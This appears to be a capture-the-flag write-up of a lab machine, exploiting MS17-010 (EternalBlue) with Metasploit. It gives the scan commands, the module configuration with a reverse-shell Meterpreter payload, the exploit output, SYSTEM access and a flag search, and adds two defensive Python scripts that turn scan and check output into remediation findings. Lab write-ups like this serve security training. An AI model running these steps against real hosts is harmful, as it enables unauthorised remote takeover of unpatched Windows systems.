The MrBlue machine was a classic EternalBlue exploit challenge for beginners. This was a great opportunity to learn about vulnerabilities in SMB and practice exploitation using Metasploit.
Key Takeaways:
- EternalBlue exploits SMB vulnerabilities, particularly on port 445.
- Always verify your exploit target to avoid failed attempts.
- Metasploit simplifies exploitation, but understanding the underlying vulnerability is crucial.
Feel free to try this machine and share your experiences! 🎉
Initial Thoughts
The name "MrBlue" hints at the infamous EternalBlue exploit (MS17-010), which targets vulnerabilities in the SMB protocol. This was my primary lead.
Step 1: Scanning the Target
First, I started with a quick Nmap scan to check open ports and services on the target:
db_nmap 10.150.150.242
Results showed several ports were open, including port 445 (SMB service):
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s
3389/tcp open  ms-wbt-server
[msf](Jobs:0 Agents:0) >> db_nmap 10.150.150.242
[*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 11:43 EAT
[*] Nmap: Nmap scan report for 10.150.150.242
[*] Nmap: Host is up (0.28s latency).
[*] Nmap: Not shown: 985 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 53/tcp open domain
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 1433/tcp open ms-sql-s
[*] Nmap: 3389/tcp open ms-wbt-server
[*] Nmap: 8089/tcp open unknown
[*] Nmap: 49152/tcp open unknown
[*] Nmap: 49153/tcp open unknown
[*] Nmap: 49154/tcp open unknown
[*] Nmap: 49155/tcp open unknown
[*] Nmap: 49156/tcp open unknown
[*] Nmap: 49157/tcp open unknown
[*] Nmap: 49158/tcp open unknown
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.86 seconds
[msf](Jobs:0 Agents:0) >> db_nmap -sV -sC 53,80,135,139,445,1433,3389 10.150.150.242
[*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 11:45 EAT
[*] Nmap: 'Failed to resolve "53,80,135,139,445,1433,3389".'
[-] db_nmap: Interrupted
[msf](Jobs:0 Agents:0) >> db_nmap -sV -sC -p53,80,135,139,445,1433,3389 10.150.150.242
[*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 11:45 EAT
[*] Nmap: Nmap scan report for 10.150.150.242
[*] Nmap: Host is up (0.23s latency).
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 53/tcp filtered domain
[*] Nmap: 80/tcp filtered http
[*] Nmap: 135/tcp filtered msrpc
[*] Nmap: 139/tcp filtered netbios-ssn
[*] Nmap: 445/tcp filtered microsoft-ds
[*] Nmap: 1433/tcp filtered ms-sql-s
[*] Nmap: 3389/tcp filtered ms-wbt-server
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 4.35 seconds
[msf](Jobs:0 Agents:0) >>
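As an added example (not code from the write-up), the script below parses Nmap port tables like the ones above into defender findings. The two tables are constructed from the scan output shown here; the remediation notes in RISKY are my own wording. It also diffs the two scans, because the -sV -sC rescan reported the same ports as filtered, which is inconclusive and should trigger a rescan rather than close the finding.

```python
"""Triage Nmap port-table output for SMB exposure.

Added example for this write-up, not the author's code. The two tables below
are constructed from the scan output shown above; the RISKY notes are the
defender's follow-up actions and are this example's own wording.
"""
import re
from dataclasses import dataclass

FIRST_SCAN = """\
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
3389/tcp  open  ms-wbt-server
8089/tcp  open  unknown
"""

# The -sV -sC rescan in the write-up reported the same ports as filtered.
SECOND_SCAN = """\
PORT     STATE    SERVICE       VERSION
445/tcp  filtered microsoft-ds
1433/tcp filtered ms-sql-s
3389/tcp filtered ms-wbt-server
"""

# One Nmap port line: "445/tcp open microsoft-ds" (a VERSION column may follow).
PORT_LINE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")

# Services that need a finding when reachable, with the defender's action.
RISKY = {
    139: ("NetBIOS-SSN", "legacy SMB transport, block at the perimeter"),
    445: ("SMB", "verify the MS17-010 patch is installed, disable SMBv1, restrict 445 to trusted networks"),
    1433: ("MSSQL", "database port should not be reachable from untrusted networks"),
    3389: ("RDP", "restrict to VPN or jump host and require NLA plus MFA"),
}


@dataclass(frozen=True)
class PortRecord:
    port: int
    proto: str
    state: str
    service: str


def parse_ports(text):
    """Parse the port/state/service rows of Nmap's normal output; header and banner lines are skipped."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            records.append(PortRecord(int(m["port"]), m["proto"], m["state"], m["service"]))
    return records


def findings(text):
    """Return one finding string per risky TCP port; 'filtered' is reported as inconclusive, not closed."""
    out = []
    for rec in parse_ports(text):
        if rec.proto != "tcp" or rec.port not in RISKY:
            continue
        name, action = RISKY[rec.port]
        if rec.state == "open":
            out.append(f"{rec.port}/tcp {name} open: {action}")
        elif rec.state == "filtered":
            out.append(f"{rec.port}/tcp {name} filtered: inconclusive, rescan before closing the finding")
    return out


def diff_states(first, second):
    """Map port -> (old_state, new_state) for TCP ports whose state changed between two scans of one host."""
    before = {r.port: r.state for r in parse_ports(first) if r.proto == "tcp"}
    after = {r.port: r.state for r in parse_ports(second) if r.proto == "tcp"}
    return {p: (before[p], after[p]) for p in before.keys() & after.keys() if before[p] != after[p]}


if __name__ == "__main__":
    for f in findings(FIRST_SCAN):
        print(f)
    for port, (old, new) in sorted(diff_states(FIRST_SCAN, SECOND_SCAN).items()):
        print(f"{port}/tcp changed {old} -> {new}: rescan before reporting")
```

Ports that only appear in one of the two scans are left out of the diff on purpose: a port missing from a targeted -p rescan says nothing about its state.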
Step 2: Exploit Discovery
Using Metasploit, I searched for modules related to EternalBlue:
search eternalblue
The module of interest was:
exploit/windows/smb/ms17_010_eternalblue
[msf](Jobs:0 Agents:0) >> search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
Step 3: Setting Up the Exploit
I loaded the module and configured the necessary parameters:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.150.150.242
set RPORT 445
set LHOST tun0
I verified the target's vulnerability before exploiting it; the module's own MS17-010 check (auxiliary/scanner/smb/smb_ms17_010) runs first when you launch it:
run
Metasploit confirmed the target was vulnerable!
[msf](Jobs:0 Agents:0) >> use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set RHOSTS 10.150.150.242
RHOSTS => 10.150.150.242
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set RPORT 445
RPORT => 445
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set LHOST tun0
LHOST => tun0
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> option
[-] Unknown command: option
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.150.150.242 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
Step 4: Exploiting the Target
Once validated, the exploit ran successfully. After some time, I gained a Meterpreter session as NT AUTHORITY\SYSTEM—the highest privilege level on Windows!
getuid
Server username: NT AUTHORITY\SYSTEM
Step 5: Capturing the Flag
I navigated through the filesystem to locate the flag on the Administrator's desktop:
cd C:\Users\Administrator.GNBUSCA-W054\Desktop
ls
cat FLAG34.txt
And there it was—FLAG34.txt contained the hash:
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> run
[*] Started reverse TCP handler on 10.66.66.54:4444
[*] 10.150.150.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.150.150.242:445 - The target is vulnerable.
[*] 10.150.150.242:445 - Connecting to target for exploitation.
[+] 10.150.150.242:445 - Connection established for exploitation.
[+] 10.150.150.242:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.150.150.242:445 - CORE raw buffer dump (53 bytes)
[*] 10.150.150.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.150.150.242:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.150.150.242:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 10.150.150.242:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 10.150.150.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.150.150.242:445 - Trying exploit with 12 Groom Allocations.
[*] 10.150.150.242:445 - Sending all but last fragment of exploit packet
[*] 10.150.150.242:445 - Starting non-paged pool grooming
[+] 10.150.150.242:445 - Sending SMBv2 buffers
[+] 10.150.150.242:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.150.150.242:445 - Sending final SMBv2 buffers.
[*] 10.150.150.242:445 - Sending last fragment of exploit packet!
[*] 10.150.150.242:445 - Receiving response from exploit packet
[+] 10.150.150.242:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.150.150.242:445 - Sending egg to corrupted connection.
[*] 10.150.150.242:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.150.150.242
[*] Meterpreter session 1 opened (10.66.66.54:4444 -> 10.150.150.242:51246) at 2024-09-10 11:48:40 +0300
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
(Meterpreter 1)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM
(Meterpreter 1)(C:\Windows\system32) > cd C:\
> /
(Meterpreter 1)(C:\) > dir
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 4096 dir 2009-07-14 05:34:39 +0300 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2009-07-14 08:06:44 +0300 Documents and Settings
040777/rwxrwxrwx 0 dir 2009-07-14 06:20:08 +0300 PerfLogs
040555/r-xr-xr-x 4096 dir 2020-01-17 21:27:24 +0300 Program Files
040555/r-xr-xr-x 4096 dir 2019-10-25 12:04:54 +0300 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2019-05-23 23:14:19 +0300 ProgramData
040777/rwxrwxrwx 0 dir 2016-06-27 19:03:35 +0300 Recovery
040777/rwxrwxrwx 4096 dir 2016-11-04 21:43:25 +0300 System Volume Information
040555/r-xr-xr-x 4096 dir 2019-05-23 23:33:19 +0300 Users
040777/rwxrwxrwx 16384 dir 2020-01-17 21:27:24 +0300 Windows
040777/rwxrwxrwx 4096 dir 2016-06-27 12:36:28 +0300 inetpub
000000/--------- 0 fif 1970-01-01 03:00:00 +0300 pagefile.sys
(Meterpreter 1)(C:\) > cd Users\
> /
(Meterpreter 1)(C:\Users) > dir
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2019-05-23 23:14:28 +0300 Administrator.GNBUSCA-W054
040777/rwxrwxrwx 0 dir 2009-07-14 08:06:44 +0300 All Users
040777/rwxrwxrwx 0 dir 2016-06-27 12:05:13 +0300 Classic .NET AppPool
040555/r-xr-xr-x 8192 dir 2009-07-14 09:29:45 +0300 Default
040777/rwxrwxrwx 0 dir 2009-07-14 08:06:44 +0300 Default User
040777/rwxrwxrwx 8192 dir 2016-06-27 11:58:38 +0300 MSSQL$SQLEXPRESS
040555/r-xr-xr-x 4096 dir 2009-07-14 07:57:55 +0300 Public
100666/rw-rw-rw- 174 fil 2009-07-14 07:57:55 +0300 desktop.ini
(Meterpreter 1)(C:\Users) > ls All\ Users\\
ls All\ Users\\Application\ Data\\ ls All\ Users\\Favorites\\ ls All\ Users\\Package\ Cache\\ ls All\ Users\\VMware\\
ls All\ Users\\Desktop\\ ls All\ Users\\GroupPolicy\\ ls All\ Users\\Start\ Menu\\ ls All\ Users\\VsTelemetry\\
ls All\ Users\\Documents\\ ls All\ Users\\Microsoft\\ ls All\ Users\\Templates\\
(Meterpreter 1)(C:\Users) > ls All\ Users\\Desktop\\
[-] stdapi_fs_ls: Operation failed: Access is denied.
(Meterpreter 1)(C:\Users) > ls Administrator.GNBUSCA-W054\\Desktop\\
Listing: Administrator.GNBUSCA-W054\Desktop\
============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 40 fil 2019-05-24 18:19:38 +0300 FLAG34.txt
100666/rw-rw-rw- 282 fil 2019-05-23 23:14:29 +0300 desktop.ini
(Meterpreter 1)(C:\Users) > cd Administrator.GNBUSCA-W054\\Desktop\\
(Meterpreter 1)(C:\Users\Administrator.GNBUSCA-W054\Desktop) > cat FLAG34.txt
[ REDACTED ]
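From the defender's side, the useful part of the console output above is the check verdict and the OS banner, which belong in a patch ticket rather than a screenshot. As an added example (not the write-up's or Metasploit's code), the script below turns msfconsole MS17-010 check output into a structured finding and decodes the raw buffer dump back into the OS string. CONSOLE is constructed from the lines shown above with the hex column kept at its original width; the second host and its "does NOT appear vulnerable" line are my own addition to show the negative path, so that exact wording is an assumption, not a quote of Metasploit.

```python
"""Turn msfconsole MS17-010 check output into a structured finding.

Added example for this write-up, not the author's or Metasploit's code.
CONSOLE is constructed from the console lines in the write-up; the
10.150.150.251 host and the "does NOT appear vulnerable" wording are
assumptions added to exercise the not-vulnerable path.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

CONSOLE = """\
[*] 10.150.150.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[+] 10.150.150.242:445 - The target is vulnerable.
[*] 10.150.150.242:445 - CORE raw buffer dump (53 bytes)
[*] 10.150.150.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.150.150.242:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 10.150.150.242:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P
[*] 10.150.150.242:445 - 0x00000030 61 63 6b 20 31                                   ack 1
[*] 10.150.150.251:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.150.150.251:445 - Host does NOT appear vulnerable.
"""

# "[+] host:port - message" prefix used by the module output.
PREFIX = re.compile(r"^\[[*+\-!]\] (?P<host>\d+(?:\.\d+){3}):(?P<port>\d+) - (?P<body>.*)$")
VULN = re.compile(r"Host is likely VULNERABLE to MS17-010! - (?P<os>.+)$")
NOT_VULN = re.compile(r"does NOT appear vulnerable")  # assumed wording, see docstring
# Hex dump row: offset, hex bytes, then (after two or more spaces) the ASCII view.
HEXLINE = re.compile(r"^0x[0-9a-fA-F]{8} (?P<rest>.*)$")


@dataclass
class Finding:
    host: str
    port: int
    vulnerable: Optional[bool] = None   # None = check did not conclude
    os_banner: str = ""                  # from the check verdict line
    dump: bytearray = field(default_factory=bytearray)  # decoded raw buffer dump

    @property
    def os_from_dump(self):
        return self.dump.decode("ascii", errors="replace")


def parse_console(text):
    """Return {host: Finding} built from the module's console lines."""
    findings = {}
    for line in text.splitlines():
        m = PREFIX.match(line)
        if not m:
            continue
        f = findings.setdefault(m["host"], Finding(m["host"], int(m["port"])))
        body = m["body"]
        v = VULN.search(body)
        if v:
            f.vulnerable = True
            f.os_banner = v["os"].strip()
            continue
        if NOT_VULN.search(body):
            f.vulnerable = False
            continue
        h = HEXLINE.match(body)
        if h:
            # Keep only the hex column: everything before the first run of two or more spaces.
            hexcol = re.split(r"\s{2,}", h["rest"].strip(), maxsplit=1)[0]
            f.dump += bytes.fromhex("".join(hexcol.split()))
    return findings


def remediation(f):
    """Defender actions for one finding (this example's own wording)."""
    if f.vulnerable is False:
        return ["no MS17-010 action needed; keep SMBv1 disabled"]
    if f.vulnerable is None:
        return ["check inconclusive; rerun it or verify the patch level on the host"]
    steps = [
        "apply the MS17-010 security update",
        "disable SMBv1, which EternalBlue relies on",
        f"restrict TCP/{f.port} to trusted networks",
    ]
    if "2008 R2" in f.os_banner:
        steps.append("Windows Server 2008 R2 is past end of extended support; plan migration")
    return steps


if __name__ == "__main__":
    for host, f in parse_console(CONSOLE).items():
        print(host, f.vulnerable, f.os_banner or f.os_from_dump)
        for step in remediation(f):
            print("  -", step)
```

The 53 decoded bytes match the "CORE raw buffer dump (53 bytes)" line, which is a cheap consistency check that the dump parser read the hex column and not the ASCII view.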